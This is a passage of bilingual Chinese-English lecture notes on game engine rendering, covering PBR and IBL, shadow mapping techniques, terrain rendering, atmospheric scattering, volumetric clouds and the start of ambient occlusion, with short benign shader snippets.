    1. 金属度(Metallic): 这个参数表示表面材质的金属属性程度。金属度为 0 表示非金属材质,例如塑料、木材等,而金属度为 1 表示完全是金属材质,例如铁、铜等。金属材质具有较强的镜面反射特性,因此在光照下会产生清晰的高光反射,而非金属材质则通常具有更多的漫反射。
    2. 粗糙度(Roughness): 这个参数表示表面的光滑程度。粗糙度为 0 表示表面非常光滑,反射光线呈现清晰的镜面反射,而粗糙度为 1 表示表面非常粗糙,反射光线呈现模糊的散射。具有较高粗糙度的表面会导致光线在各个方向上散射,产生柔和的光照效果,而较低粗糙度的表面则会产生更锐利的反射光线。

    webp

    Convert MR to SG

    webp

    PBR Pipeline MR vs SG

    webp

    MR

    • Pros

      • Can be easier to author and less prone to errors caused by supplying incorrect dielectric F0 data

        可以更轻松地编写,并且不易因提供不正确的介电 F0 数据而导致错误

      • Uses less texture memory, as metallic and roughness are both grayscale maps

        使用更少的纹理内存,因为金属和粗糙度都是灰度图

    • Cons

      • No control over F0 for dielectrics in map creation. However, most implementations have a specular control to override the base 4% value

        在制作贴图时无法控制电介质的 F0。然而,大多数实现都有镜面反射控制来覆盖 4% 的基础值

      • Edge artifacts are more noticeable, especially at lower resolutions

        边缘伪影更加明显,尤其是在较低分辨率下

    SG

    • Pros

      • Edge artifacts are less apparent

        边缘伪影不太明显

      • Control over dielectric F0 in the specular map

        控制镜面反射图中的电介质 F0

    • Cons

      • Because the specular map provides control over dielectric F0, it is more susceptible to use of incorrect values. It is possible to break energy conservation if handled incorrectly in the shader

        由于镜面反射贴图提供对电介质 F0 的控制,因此更容易使用不正确的值。如果在着色器中处理不当,可能会违反守恒定律

      • Uses more texture memory with an additional RGB map

        使用更多纹理内存和额外的 RGB 贴图

    Image-Based Lighting (IBL)

    Basic Idea of IBL

    ​IBL(Image-Based Lighting)是一种计算机图形学中常用的光照技术,用于模拟真实世界中的光照效果。它基于图像的方式来描述光照信息,通过对环境中的光照进行捕捉和处理,来为场景中的物体赋予逼真的光照效果。

    ​IBL 的基本原理是利用环境贴图(Environment Map)来模拟环境中的光照。环境贴图通常是一个球形或立方体贴图,捕捉了环境中的光照信息,包括天空、周围物体的反射等。这些贴图可以是基于真实场景拍摄的全景图像,也可以是通过计算得到的环境光照信息。

    webp

    • An image representing distant lighting from all directions.

      代表来自各个方向的远处照明的图像。

    • How to shade a point under the lighting?

      如何在灯光下对点进行着色?

      Solving the rendering equation:

      求解渲染方程:

      $L_{o}(x,\omega_{o})=\int_{H^{2}}f_{r}(x,\omega_{o},\omega_{i})L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i}$

    • Using Monte Carlo integration

      使用蒙特卡罗积分

      Requires a large amount of sampling, which is slow!

      采样量大-慢!

    webp

    Recall BRDF Function

    $$L_{o}(\boldsymbol{x},\omega_{o})=\int_{H^{2}}f_{r}(\boldsymbol{x},\omega_{o},\omega_{i})L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i}\\f_{r}=k_{d}f_{Lambert}+f_{CookTorrance}$$

    • $f_{Lambert}$ diffuse
    • $f_{CookTorrance}$ specular

    $$\begin{aligned}
    L_{o}(x,\omega_{o})& =\int_{H^{2}}(k_{d}f_{Lambert}+f_{CookTorrance})L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i} \\
    &=\int_{H^{2}}k_{d}f_{Lambert}L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i}+\int_{H^{2}}f_{CookTorrance}L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i} \\
    &=L_d(x,\omega_o)+L_s(x,\omega_o)
    \end{aligned}$$

    Diffuse Irradiance Map

    • Irradiance Map

    webp

    Specular Approximation

    webp

    Approximation: part (1/2)

    webp

    Approximation: part (2/2)

    webp

    Quick Shading with Precomputation

    ​通过预计算进行快速着色

    webp
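
    预计算的运行时一侧通常是常见的 split-sum 形式:一张按粗糙度预过滤、以 mip 级别索引的环境贴图,加上一张以 (NdotV, roughness) 索引的 2D BRDF 查找表。下面是一个草图;纹理名与 MAX_MIP 均为假设。

    uniform samplerCube prefilteredEnv;   // radiance prefiltered per roughness mip
    uniform sampler2D   brdfLUT;          // r: scale for F0, g: bias
    const float MAX_MIP = 4.0;            // illustrative mip count of the prefiltered map

    vec3 specularIBL(vec3 N, vec3 V, float roughness, vec3 F0) {
        vec3 R = reflect(-V, N);
        // First sum: prefiltered incoming radiance along the reflection direction.
        vec3 prefiltered = textureLod(prefilteredEnv, R, roughness * MAX_MIP).rgb;
        // Second sum: precomputed environment BRDF (scale/bias on F0).
        vec2 ab = texture(brdfLUT, vec2(max(dot(N, V), 0.0), roughness)).rg;
        return prefiltered * (F0 * ab.x + ab.y);
    }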

    Shading PBR with IBL

    ​加入环境贴图后,效果更加真实。

    webp

    Classic Shadow Solution

    Big World and Cascade Shadow

    webp

    • Partition the frustum into multiple frustums

      将视锥体划分为多个视锥体

    • A shadow map is rendered for each sub frustum

      为每个子视锥体渲染阴影贴图

    • The pixel shader then samples from the map that most closely matches the required resolution

      像素着色器然后从与所需分辨率最匹配的贴图中进行采样

    Steps of Cascade Shadow

    ​级联阴影的步骤

    ​Cascade Shadow Mapping(级联阴影映射)是一种用于实时渲染中实现高质量阴影的技术。它被广泛应用于游戏引擎和其他实时渲染应用程序中,以提供更逼真的场景光照效果。

    ​Cascade Shadow Mapping 的基本思想是将场景中的光源视锥体(例如平行光源的视锥体)分成多个不同分辨率的子区域,每个子区域被称为一个级联(cascade)。然后,为每个级联计算一个独立的深度贴图(depth map),用于记录从光源视角下每个像素到场景中可见点的距离。

    ​通常,级联的数量和分辨率会根据距离光源的远近而动态调整,以确保远处的物体能够得到足够高的深度分辨率,从而减少阴影的锯齿状边缘(aliasing),同时避免过度消耗资源。通常情况下,近处级联具有更高的分辨率,而远处级联具有较低的分辨率。

    ​一旦每个级联的深度贴图都准备好了,就可以在渲染阴影的阶段使用它们。具体来说,对于每个要接受阴影的像素,都会根据其在世界空间中的位置和光源的视角来计算其在每个级联深度贴图中的深度值。然后,通过比较每个像素的深度值与相应级联深度贴图中的深度值,就可以确定像素是否在阴影中。

    webp

    splitFrustumToSubfrusta();
    calculateOrthoProjectionsForEachSubfrustum();
    renderShadowMapForEachSubfrustum();
    renderScene();

    vs_main() {
    calculateWorldPosition()
    }

    ps_main() {
    transformWorldPositionsForEachProjections()
    sampleAllShadowMaps()
    compareDepthAndLightingPixel()
    ...
    }

    Blend between Cascade Layers

    ​级联层之间的混合

    webp

    1. A visible seam can be seen where cascades overlap, because the resolutions of the two cascade layers do not match

      级联重叠处可以看到明显的接缝,因为两层级联的分辨率不匹配

    2. The shader then linearly interpolates between the two values based on the pixel's location in the blend band

      然后,着色器根据像素在混合带中的位置在两个值之间进行线性插值

    Pros and Cons of Cascade Shadow

    • Pros

      • the best way to fight the most prevalent shadowing error: perspective aliasing

        解决阴影常见错误的最佳方法:透视锯齿

      • fast to generate the depth map, up to 3x faster when writing depth only

        快速生成深度图,仅深度写入时提高 3 倍

      • provide fairly good results

        提供相当好的结果

    • Cons

      • Nearly impossible to generate high quality area shadows

        几乎不可能生成高质量的区域阴影

      • No colored shadows. Translucent surfaces cast opaque shadows

        没有彩色阴影。半透明表面投射不透明阴影

    Hard Shadow vs Realistic Shadow

    webp

    PCF - Percentage Closer Filter

    ​PCF - 百分比接近过滤器

    ​PCF(Percentage Closer Filter)是一种用于改善阴影质量的技术,特别是在阴影映射中使用。它的目的是减少阴影边缘的锯齿(aliasing),使阴影更加柔和和逼真。

    ​阴影映射通常会生成一个深度贴图(depth map),用于记录从光源视角下到场景中各个点的距离。在渲染场景时,为了确定一个像素是否在阴影中,通常会比较场景中的点与光源的深度值。然而,简单地使用深度比较可能会导致锯齿状边缘,特别是在阴影投射到接近相机的表面上时。

    ​PCF 解决了这个问题。它通过对深度贴图中的深度值进行多次采样,并计算每次采样时像素与深度值的关系,以确定像素是否在阴影中。这些采样通常是在深度贴图的附近进行的,并且通常是在一个较小的范围内。这样,即使像素与阴影边缘接近,也能够准确地检测出阴影的存在,从而减少锯齿状边缘的问题。

    webp

    • Target problem

      目标问题

      • The shadows that result from shadow mapping aliasing is serious

        阴影贴图锯齿导致的阴影很严重

    • Basic idea

      基本思想

      • Sample from the shadow map around the current pixel and compare its depth to all the samples

        从当前像素周围的阴影贴图进行采样,并将其深度与所有样本进行比较

      • By averaging out the results we get a smoother line between light and shadow

        通过对结果进行平均,我们可以得到光影之间更平滑的线条
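
    按上面的思路,一个最小化的 3x3 PCF 草图如下,复用前文阴影贴图投影代码得到的 shadow_uv 与 real_depth;函数名与 texelSize 参数(阴影贴图分辨率的倒数)均为假设。

    // 3x3 PCF: average the depth comparisons of the neighborhood.
    float pcfShadow(sampler2D shadowmap, vec2 shadow_uv, float real_depth, vec2 texelSize) {
        float sum = 0.0;
        for (int x = -1; x <= 1; ++x)
            for (int y = -1; y <= 1; ++y) {
                float d = texture(shadowmap, shadow_uv + vec2(x, y) * texelSize).x;
                sum += (d < real_depth) ? 0.0 : 1.0;   // 0 = shadowed, 1 = lit
            }
        return sum / 9.0;   // averaged visibility gives a smoother shadow edge
    }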

    PCSS - Percentage Closer Soft Shadow

    ​PCSS - 百分比接近软阴影

    ​Percentage Closer Soft Shadow(PCSS)是一种用于实时渲染中生成柔和阴影的技术。它是 Percentage Closer Filter(PCF)的一种变体,旨在在阴影边缘产生更加柔和和逼真的效果。

    ​PCSS 通过在每个像素处进行多个样本的深度比较,并根据深度比较结果和光源距离来计算阴影的柔和度。与传统的硬阴影相比,PCSS 考虑了阴影边缘周围的光线传播和遮挡,以模拟真实世界中光线的衍射和散射效应。

    PCSS 的实现通常包括以下步骤:

    1. 生成阴影贴图(Shadow Map): 首先,生成场景的深度贴图,用于记录从光源视角下到场景中各个点的距离。
    2. 多样本采样: 在渲染阶段,对于每个要接受阴影的像素,进行多个样本的深度比较。这些样本通常位于阴影边缘周围,并且可以通过多次采样来模拟光线的传播。
    3. 计算柔和阴影: 根据每个样本的深度比较结果以及光源与表面的距离,计算阴影的柔和度。通常,较远离光源的像素会产生较宽的阴影区域,而较接近光源的像素会产生较窄的阴影区域。
    4. 混合阴影: 将多个样本的阴影值进行加权平均,以获得最终的柔和阴影结果。这样可以使阴影边缘呈现出逐渐变化的过渡效果,减少锯齿状边缘。

    webp

    • Target problem

      目标问题

      • Suffers from aliasing and under sampling artifacts

        存在混叠和采样不足的问题

    • Basic idea

      基本思想

      • Search the shadow map and average the depths that are closer to the light source

        搜索阴影贴图并平均靠近光源的深度

      • Using a parallel planes approximation

        使用平行平面近似

    Variance Soft Shadow Map

    webp

    • Target problem

      目标问题

      • Rendering plausible soft shadow in real-time

        实时渲染合理的软阴影

    • Basic idea

      基本思想

      • Based on Chebyshev’s inequality, using the average and variance of depth, we can approximate the percentage of depth distribution directly instead of comparing a single depth to a particular region (PCSS)

        基于切比雪夫不等式,使用深度的平均值和方差,我们可以直接近似深度分布的百分比,而不是将单个深度与特定区域进行比较(PCSS)

    ​目前 3A 渲染广泛用到的技术:

    • Lightmap + Light probe
    • PBR + IBL
    • Cascade shadow + VSSM

    Moving Wave of High Quality

    Quick Evolving of GPU

    ​得益于 GPU 的发展,计算能力不断增强。

    • More flexible new shader model

      更灵活的新着色器模型

      • Compute shader

        计算着色器

      • Mesh shader

        网格着色器

      • Ray-tracing shader

        光线追踪着色器

    • High performance parallel architecture

      高性能并行架构

      • Warp or wave architecture

        扭曲或波浪结构

    • Fully opened graphics APl

      完全开放的图形 APl

      • DirectX 12 and Vulkan

        DirectX 12 和 Vulkan

    Real-Time Ray-Tracing on GPU

    webp

    ​新的 GPU 支持实时光线追踪。

    Real-Time Global lllumination

    webp

    More Complex Material Model

    webp

    Virtual Shadow Maps

    webp

    Shader Management

    Ocean of Shaders

    ​大游戏里用到的 Shader 非常多。

    Blow of Shaders

    ​要求在每帧中渲染场景中的多个 shader。

    Artist Create infinite More Shaders

    ​艺术家创造无限更多的着色器

    Uber Shader and Variants

    ​Uber 着色器和变体

    A combination of shader for all possible light types, render passes and material types

    ​适用于所有可能的灯光类型、渲染通道和材质类型的着色器组合

    • Shared many state and codes

      共享许多状态和代码

    • Compile to many variant short shaders by pre-defined macro

      通过预定义宏编译为许多变体短着色器

    // sky light
    #if ENABLE_SKY_LIGHT
    #if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
    if (NoL == 0) {
    #endif

    #if MATERIAL_SHADINGMODEL_SINGLELAYERWATER
        ShadingModelContext.WaterDiffuseIndirectLuminance += SkyDiffuseLighting;
    #endif

        Color += SkyDiffuseLighting * half3(ResolvedView.SkylightColor.rgb) * ShadingModelContext.DiffuseColor * MaterialAO;
    #if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
    }
    #endif
    #endif

    Shader Variants Example In Real Game

    ​真实游戏中的着色器变体示例

    webp

    ​一大堆。为了降低耦合性,每个 shader 都是单独存在的。

    Cross Platform Shader Compile

    webp

    ​写 shader 也演变出了一堆语言!

    第六节(上):游戏中地形大气和云的渲染

    ​MD 天书……

    Rendering on Game Engine

    The Challenges and Fun of Rendering the Beautiful Mother Nature

    ​渲染美丽大自然的挑战和乐趣

    Real-World Landscape

    webp

    • Huge geospatial scale

      巨大的地理空间尺度

    • Rich geomorphological

      地貌丰富

      • Vegetation

        植被

      • Rivers

        河流

      • Undulating peaks

        起伏的山峰

      • Alpine snow

        高山雪

    Too Complex for Rendering Using Traditional Mesh + Material

    ​使用传统网格 + 材质渲染过于复杂

    Environment Components in Games

    webp

    Simple Idea - Heightfield

    webp

    Height Map

    ​高度图

    Contour Map

    ​等高线图

    • Satellite image and google earth

      卫星图像和谷歌地球

    Expressive Heightfield Terrains

    ​富有表现力的高度场地形

    Render Terrain with Heightfield

    ​使用高度场渲染地形

    webp

    Adaptive Mesh Tessellation

    ​自适应网格细分

    webp

    ​fov 内的网格密集,外的不密集。

    Two Golden Rules of Optimization

    ​两条优化黄金法则

    webp

    View-dependent error bound

    ​与视角相关的误差上界

    • Distance to camera and FoV

      到相机和 FoV 的距离

    • Error compared to ground truth (pre-computation)

      与真实情况相比的误差(预计算)

    Triangle-Based Subdivision

    ​基于三角形的细分

    webp

    Subdivision and T-Junctions

    ​T-Junctions(T 字连接)是在计算机图形学中用于描述三角形网格连接关系的术语。当两个或多个三角形共享一个边时,它们在连接点形成了 T 字型的结构。这种连接在三维网格模型的拓扑结构中相当常见。

    ​T-Junctions 通常出现在网格的边缘、拐角或交叉点附近。它们可能会出现在几何体的建模、网格编辑、或者在进行几何操作(如网格合并、分割、细分等)时。在渲染阶段,T-Junctions 可能会导致一些问题,尤其是在基于三角形的图形渲染中,因为它们可能会导致不正确的图形拓扑和渲染结果。

    webp

    Continuously partitioning triangles and their children based on the idea of binary trees

    ​基于二叉树的思想连续划分三角形及其子节点

    Triangle-Based Subdivision on GPU

    webp

    54 x 54 km terrain on GPU using the Unity game engine

    ​根据 GPU 架构设计的算法。

    QuadTree-Based Subdivision

    ​基于四叉树的细分

    webp

    Pros

    • Easy to construct

      易于建造

    • Easy management of data under geospatial, including objects culling and data streaming

      轻松管理地理空间下的数据,包括对象剔除和数据流

    Cons

    • Mesh subdivision is not as flexible as triangle mesh

      网格细分不如三角形网格灵活

    • The grid level of the leaf nodes needs to be consistent

      叶子节点的网格层级需要一致

    webp

    Solving T-Junctions among Quad Grids

    ​求解四边形网格之间的 T 型连接点

    webp

    Terrain Rendering with Quad Grid

    ​使用四网格进行地形渲染

    Triangulated Irregular Network (TIN)

    ​不规则三角网 (TIN)

    webp

    Density Variants in TIN

    ​TIN 中的密度变化

    webp

    Triangulated Irregular Network vs. Adaptive Tessellation

    ​不规则三角网络与自适应曲面细分

    webp

    Pros

    • Easy runtime rendering

      易于运行时渲染

    • Fewer triangles in certain terrain types

      某些地形类型中的三角形较少

    webp

    Cons

    • Requires certain pre-processing steps

      需要一定的预处理步骤

    • Poor reusability

      可重用性差

    GPU-Based Tessellation

    ​基于 GPU 的曲面细分

    webp

    Hardware Tessellation

    ​硬件曲面细分

    webp

    Hull-Shader Stage - transforms basis functions from base mesh to surface patches

    Hull-Shader Stage - 将基函数从基础网格转换为表面补丁

    Tessellator Stage - produces a semi-regular tessellation pattern for each patch

    Tessellator Stage - 为每个补丁生成半规则的镶嵌图案

    Domain-Shader Stage - a programmable shader stage that calculates the vertex position that corresponds to each domain sample

    Domain-Shader Stage - 一个可编程着色器阶段,用于计算与每个域样本对应的顶点位置

    webp

    Mesh Shader Pipeline

    webp

    • Amplification Shader Stage - decides how many Mesh shader groups to run and passes data to those groups

      放大着色器阶段 - 决定运行多少个网格着色器组并将数据传递到这些组

    • Mesh Shader Stage - produces a semi-regular tessellation pattern for each patch; the outputs comprise vertices and primitives

      网格着色器阶段 - 为每个补丁生成半规则曲面细分图案,输出包含顶点和图元

    Real-Time Deformable Terrain

    webp

    ​在游戏运行时,地表模型会改变(如车压路上)

    Dig a Hole in Terrain

    webp

    ​给地表挖洞。

    Crazy Idea - Volumetric Representation

    ​疯狂的想法-体积表示

    webp

    In 3D computer graphics, a voxel represents a value on a regular grid in three-dimensional space. As with pixels in a 2D bitmap, voxels themselves do not typically have their position (i.e. coordinates) explicitly encoded with their values

    ​在 3D 计算机图形学中,体素表示三维空间中规则网格上的值。与 2D 位图中的像素类似,体素本身通常不随其值显式编码自身的位置(即坐标)

    Marching Cubes

    ​行进立方体

    webp

    "Marching Cubes: A High Resolution 3D Surface Construction Algorithm", Computer Graphics, Volume 21, Number 4, July 1987

    ​给模型作切片。

    Transition Cell Lookup Table

    ​过渡单元查找表

    webp

    webp

    Transvoxel Algorithm

    ​跨体素算法

    • Constructs the triangulation of transition cells to form a lookup table, and uses this lookup table to do the triangulation of LOD voxel cubes

      构造过渡单元的三角剖分以形成查找表,并使用该查找表进行 LOD 体素立方体的三角剖分

    Make AAA as Flexible as Minecraft??? :-)

    ​我的世界是一个自由度很高的游戏,目前 3A 大作很难对场景环境做出改变。

    Terrain Materials

    webp

    ​一个 Terrain 往往包含多种 Materials。

    Simple Texture Splatting

    ​简单的纹理喷溅

    webp

    float3 blend(float4 texture1, float a1, float4 texture2, float a2) {
        return texture1.rgb * a1 + texture2.rgb * a2;
    }

    ​terrain 上的纹理从一个过渡到另一个时,如果简单地使用混合,则平滑但不自然。

    Advanced Texture Splatting

    webp

    float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
        return height1 > height2 ? texture1.rgb : texture2.rgb;
    }

    ​根据高度图实现材质的过渡。

    Advanced Texture Splatting - Biased

    webp

    ​引入 Height Bias。

    float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
        float depth = 0.2;
        float ma = max(texture1.a + height1, texture2.a + height2) - depth;
        float b1 = max(texture1.a + height1 - ma, 0);
        float b2 = max(texture2.a + height2 - ma, 0);
        return (texture1.rgb * b1 + texture2.rgb * b2) / (b1 + b2);
    }

    Sampling from Material Texture Array

    ​从材质纹理数组采样

    webp

    Parallax and Displacement Mapping

    ​视差和位移贴图

    webp

    Parallax Mapping: Due to the height of the surface, the eye sees point B instead of point A. It creates a sense of dimensionality.

    ​视差映射:由于表面的高度,眼睛看到的是 B 点而不是 A 点。它创造了一种维度感。
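
    最简单的单次采样视差映射草图如下(GLSL):假设视线方向已变换到切线空间;heightScale 与所有命名均为示意。Steep parallax mapping 与 parallax occlusion mapping 会用多次采样改进这一近似。

    // Single-sample parallax: offset the UV along the tangent-space view
    // direction by the sampled height, so the eye "sees" B instead of A.
    vec2 parallaxUV(sampler2D heightMap, vec2 uv, vec3 viewDirTS, float heightScale) {
        float height = texture(heightMap, uv).r;
        vec2 offset = viewDirTS.xy / viewDirTS.z * height * heightScale;
        return uv - offset;
    }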

    Expensive Material Blending

    webp

    • Many Texturing - Low performance when multiple materials are sampled too many times

      许多纹理 - 对多种材质采样太多次时性能较低

    • Huge Splat Map - We only see a small part of the terrain, but we load splat maps for 100 square km into video memory

      巨大的 Splat 地图 - 我们只能看到一小部分地形,但我们将 100 平方公里的 Splat 地图加载到显存中

    Virtual Texture

    ​虚拟纹理(Virtual Texture)是一种用于实时图形渲染的技术,旨在解决在有限的显存中管理大量纹理数据的挑战。传统上,图形渲染中使用的纹理数据通常是预加载到显存中的,但这种方法在需要处理大规模纹理数据时会遇到限制,尤其是在高分辨率的场景中。

    ​虚拟纹理通过将纹理数据分割成较小的块,并根据视野和需求动态地加载和卸载这些块,以优化显存利用率并允许处理大规模纹理数据。虚拟纹理技术的核心思想是将纹理数据存储在较大的物理存储介质(如硬盘或固态硬盘)中,然后根据需要将其部分加载到显存中供渲染使用。

    webp

    • Build a virtual indexed texture to represent all blended terrain materials for the whole scene

      构建虚拟索引纹理来表示整个场景的所有混合地形材质

    • Only load materials data of tiles based on view-depend LOD

      仅根据视图相关的 LOD 加载图块的材质数据

    • Pre-bake blended materials into tiles and store them into physical textures

      将混合后的材质预烘焙到图块中,并存储到物理纹理里

    VT implementation, DirectStorage & DMA

    ​VT 实现、DirectStorage 和 DMA

    webp

    Floating-point Precision Error

    ​浮点精度误差

    webp

    ​计算中 float 的精度可能不够,导致很远的物体会出现波动。

    Camera-Relative Rendering

    webp

    • Translates objects by the negated world space camera position before any other geometric transformations affect them

      在任何其他几何变换作用于对象之前,先将对象平移负的世界空间相机位置(即减去相机位置)

    • It then sets the world space camera position to 0 and modifies all relevant matrices accordingly

      然后将世界空间相机位置设置为 0 并相应地修改所有相关矩阵

    Integration with other world elements (rocks, trees, grass)

    ​与其他世界元素(岩石、树木、草)的融合

    Tree Rendering

    webp

    ​近处树模型复杂,远处简单

    Decorator Rendering

    webp

    ​装饰渲染。近处复杂,远处简单

    Road and Decals Rendering

    ​道路和贴花渲染

    webp

    Terrain Editing in Game Engine, Procedural Terrain Creation……

    第六节(下):游戏中地形大气和云的渲染

    Sky and Atmosphere

    How to “Paint” Everything in the Sky

    webp

    ​主要讲渲染天空和云。

    Atmosphere

    Analytic Atmosphere Appearance Modeling

    ​大气外观分析建模

    webp

    $$\mathbb{F}(\theta,\gamma)=\left(1+Ae^{\frac{B}{\cos\theta+0.01}}\right)\cdot\left(C+De^{E\gamma}+F\cos^{2}\gamma+G\cdot\chi(H,\gamma)+I\cdot\cos^{\frac{1}{2}}\theta\right)$$

    $$L_{\lambda}=\mathbb{F}(\theta,\gamma)\cdot L_{M\lambda}$$

    用这么个方程就表示了整个大气外观!

    Pros

    • Calculation is simple and efficient

      计算简单高效

    Cons

    • Limited to ground view

      仅限地面视图

    • Atmosphere parameters can’t be changed freely

      气氛参数不能随意更改

    Participating Media

    ​参与介质

    webp

    Volume filled with particles

    ​充满颗粒的体积

    Interact differently with light depending on its composition

    ​与光的相互作用不同,具体取决于其成分

    How Light Interacts with Participating Media Particles?

    ​光如何与参与的介质粒子相互作用?

    webp

    • Absorption

      吸收

    • Out-scattering

      外散射

    • Emission

      发射(自发光)

    • In-scattering

      内散射

    Volume Rendering Equation (VRE)

    ​体绘制方程 (VRE)

    webp

    $$L(P,\omega)=\int_{x=0}^{d}T(x)[\sigma_{a}\cdot L_{e}(x,\omega)+\sigma_{s}\cdot L_{i}(x,\omega)]dx+T(M)L(M,\omega)$$

    $$T(x)=e^{-\int_{x}^{P}\sigma_{t}(s)ds}$$

    Transmittance: the net reduction factor from absorption and out-scattering

    ​透射率:吸收和外散射的净减少因子

    $$L_{i}(x,\omega)=\int_{S^{2}}f_{p}(x,\omega,\omega^{\prime})L(x,\omega^{\prime})d\omega^{\prime}$$

    The net increase factor from in-scattering

    ​内散射的净增加因子

    Real Physics in Atmosphere

    webp

    学习计算机图形学还要对气象学有所涉猎!

    Scattering Types

    ​散射类型

    webp

    • Rayleigh Scattering

      瑞利散射

      Scattering of light by particles that have a diameter much smaller than the wavelength of the radiation (eg. air molecules)

      直径远小于辐射波长的粒子(例如空气分子)对光进行散射

    • Mie scattering

      米氏散射

      Scattering of light by particles that have a diameter similar to or larger than the wavelength of the incident light (eg. aerosols)

      直径类似于或大于入射光波长的颗粒(例如气溶胶)对光进行散射

    Rayleigh Scattering

    ​瑞利散射

    webp

    • Certain directions receive more light than others, with front-back symmetry

      某些方向比其他方向接收更多的光线,前后对称

    • Shorter wavelengths (eg. blue) are scattered more strongly than longer wavelengths (eg.red)

      较短波长(例如蓝色)比较长波长(例如红色)散射更强烈

    webp

    Why Sky is Blue

    webp

    ​由于大气的瑞利散射,波长较短的蓝光被强烈地散射到各个方向,所以天空呈蓝色;日出日落时光路更长,蓝光被散射殆尽,直射光偏红。

    Mie Scattering

    ​米氏散射

    webp

    • Scatter light of all wavelength nearly equally

      几乎均匀地散射所有波长的光

    • Exhibit a strong forward directivity

      表现出强烈的前向方向性
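
    两种相函数在着色器里都可以写得很紧凑,供参考。cosTheta 为入射光与散射方向夹角的余弦;给米氏散射用的 Henyey-Greenstein 函数是常见的近似(g 接近 1 时给出强烈的前向峰值),并非完整的米氏解。

    const float PI = 3.14159265;

    // Rayleigh phase: front-back symmetric.
    float rayleighPhase(float cosTheta) {
        return 3.0 / (16.0 * PI) * (1.0 + cosTheta * cosTheta);
    }

    // Henyey-Greenstein phase: common approximation for the Mie lobe.
    float henyeyGreensteinPhase(float cosTheta, float g) {
        float g2 = g * g;
        return (1.0 - g2) / (4.0 * PI * pow(1.0 + g2 - 2.0 * g * cosTheta, 1.5));
    }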

    Mie Scattering Equation

    webp

    Mie Scattering in Daily Life

    ​日常生活中的米氏散射

    webp

    • Exhibit a strong forward directivity (halo effects around sun)

      表现出强烈的前向方向性(太阳周围的光晕效应)

    • Scatter light of all wavelength nearly equally (fog effects)

      几乎均匀地散射所有波长的光(雾效应)

    Variant Air Molecules Absorption

    ​不同的空气分子吸收

    webp

    • Ozone (O3)
      Absorb strongly at longer wavelengths to filter out the reds, oranges, yellows

      强烈吸收较长波长,滤除红色、橙色、黄色

    • Methane (CH4)

      Well-known for absorbing red light

      以吸收红光而闻名

    Single Scattering vs. Multi Scattering

    webp

    $$L_1=\int_A^B L_{P\to A}\,ds$$

    webp

    $$L_{n+1}=\int_{A}^{B}\int_{4\pi}L_{n}(p,v^{\prime})\cdot S(\lambda,\theta,h)\cdot T(p\to A)\,dv^{\prime}ds$$

    webp

    Ray Marching

    • Ray marching is a popular method to integrate a function along a path

      光线步进(Ray Marching)是一种沿路径对函数进行积分的常用方法

    • We use ray marching to calculate final radiance for a given point by single scattering

      我们使用光线行进通过单次散射计算给定点的最终辐射率

    • The integrated radiance is usually stored in look-up tables (LUT)

      积分得到的辐射率通常存储在查找表(LUT)中

    webp

    Precomputed Atmospheric Scattering

    ​预先计算的大气散射

    webp

    webp

    webp

    Challenges of Precomputed Atmospheric Scattering

    ​预计算大气散射的挑战

    • Precomputation Cost

      预计算成本

      • Multi-scattering iterations are very expensive

        多次散射迭代非常昂贵

      • Hard to generate atmosphere LUT on low-end devices (i.e. mobile)

        难以在低端设备(如移动设备)上生成大气 LUT

    • Authoring and Dynamic Adjustment of Environments

      环境的创作和动态调整

      • Artist can’t change scattering coefficients on the fly

        艺术家无法即时更改散射系数

      • Hard to render effects like weather from sunny to rain fog, space travel among planets

        难以渲染天气从晴朗到雨雾、行星间太空旅行等效果

    • Runtime Rendering Cost

      运行时渲染成本

      • Expensive per-pixel multi high dimensional texture sampling for transmittance LUT and multi scattering LUT (always need to down-sample for efficiency)

        昂贵的每像素多高维纹理采样,用于透射 LUT 和多散射 LUT(始终需要下采样以提高效率)

    Production Friendly Quick Sky and Atmosphere Rendering

    ​制作友好的快速天空和大气渲染

    webp

    webp

    $$\begin{aligned}&G_{n+1}=G_{n}\cdot f_{ms}\\&F_{ms}=1+f_{ms}+f_{ms}^{2}+f_{ms}^{3}+\cdots=\frac{1}{1-f_{ms}}\\&\Psi_{ms}=L_{2^{nd}order}\cdot F_{ms}\end{aligned}$$

    Simplify Multi-scattering Assumption

    ​简化多重散射假设

    • Scattering events with order greater or equal to 2 are executed using an isotropic phase function

      使用各向同性相位函数执行阶数大于或等于 2 的散射事件

    • All points within the neighborhood of the position we currently shade receive the same amount of second order scattered light

      当前阴影位置附近的所有点接收相同量的二阶散射光

    • Visibility is ignored

      忽略可见性

    webp

    Fixed view position and sun position to remove 2 dimensions out of LUT

    ​固定视图位置和太阳位置以从 LUT 中删除 2 个维度

    webp

    • Generated a 3D LUT to evaluate aerial-perspective effects by ray marching

      生成 3D LUT 以通过光线行进评估空气透视效果

    Good Balance of Performance and Effect

    ​性能与效果的良好平衡

    webp

    “Paint” Cloud

    Cloud Type

    webp

    ​云被分成了这么多种。

    Mesh-Based Cloud Modeling

    ​基于网格的云建模

    webp

    Pros

    • High quality

      高质量

    Cons

    • Overall expensive

      代价高

    • Do not support dynamic weather

      不支持动态天气

    Billboard Cloud

    webp

    ​早期游戏使用贴图描述云。

    Pros

    • Efficient

      高效的

    Cons

    • Limited visual effect

      视觉效果有限

    • Limited cloud type

      有限的云类型

    Volumetric Cloud Modeling

    ​体积云建模

    webp

    Pros

    • Realistic cloud shapes

      逼真的云形状

    • Large scale clouds possible

      可能出现大规模云

    • Dynamic weather supported

      支持动态天气

    • Dynamic volumetric lighting and shadowing

      动态体积照明和阴影

    Cons

    • Efficiency must be considered

      必须考虑效率

    Weather Texture

    webp

    Noise Functions

    webp

    Cloud Density Model

    webp

    Rendering Clouds by Ray Marching

    webp

    第七节:游戏中渲染管线、后处理和其他的一切

    Ambient Occlusion

    ​环境光遮蔽

    webp

    ​环境光遮蔽(Ambient Occlusion)是一种计算机图形学中的技术,用于模拟光线在环境中传播时,由于物体之间的遮挡而导致的阴影效果。它可以增强场景的真实感和细节,使得物体之间的联系更加紧密。

